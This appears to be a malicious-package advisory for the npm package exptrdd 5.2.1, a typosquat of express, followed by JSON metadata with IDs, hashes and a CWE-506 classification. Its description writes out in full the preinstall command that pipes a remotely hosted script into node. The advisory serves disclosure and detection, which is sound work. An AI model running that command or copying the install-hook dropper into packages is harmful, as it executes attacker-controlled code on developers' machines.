-= Per source details. Do not edit below this line.=-
package.json declares a preinstall lifecycle that runs curl https://web.archive.org/web/https://codeberg.org/hellscripter/install-scripts/raw/branch/main/node.js | node, fetching an unpinned script from a mutable branch and piping it directly into node on every npm install. The fetched code runs with the installer's privileges and can perform arbitrary actions on the host. The package identity is a typosquat of express: name is exptrdd while the description, keywords, author, and repository fields are copied verbatim from expressjs/express, so developers who mistype express install the dropper. The remote source (codeberg branch, proxied through web.archive.org) is attacker-controlled and mutable, so the executed payload can change at any time without a package republish.
{
"malicious-packages-origins": [
{
"id": "IN-MAL-2026-020626",
"import_time": "2026-09-29T14:44:37.152333146Z",
"modified_time": "2026-09-29T14:39:22Z",
"sha256": "6ba0b22d41f4edf82552b79417b6660bc1aaf311e4ec597b31674f0b6fdd5314",
"source": "amazon-inspector",
"versions": [
"5.2.1"
]
}
]
}[
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
}
]
{
"evidence_files": [
{
"path": "package.json",
"sha256": "35c27145148e489ab8fcc6ff09201ee8806a01b26dc2313199ccea49b8d9c400",
"tlsh": "3e51da21cc0e8c6326c5a2dd3c69a542612188078e41f81cf769539c8f8e56f71b9fbf"
}
],
"package_integrity": [
{
"filename": "exptrdd-5.2.1.tgz",
"hashes": {
"sha1": "fc58a91ed7c5a2fb45ff4576cfd90c9e2340ba94",
"sha512_sri": "sha512-mheJ2q9ybO70PBK3n/0QC/Bg4DEi13mtUvkDtqqD0rjL6ILm4jxtv0W7rVi+/hYtc5AVBZFm3LKNeW0TBQuoRQ=="
}
}
]
}
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/exptrdd/MAL-2026-17245.json"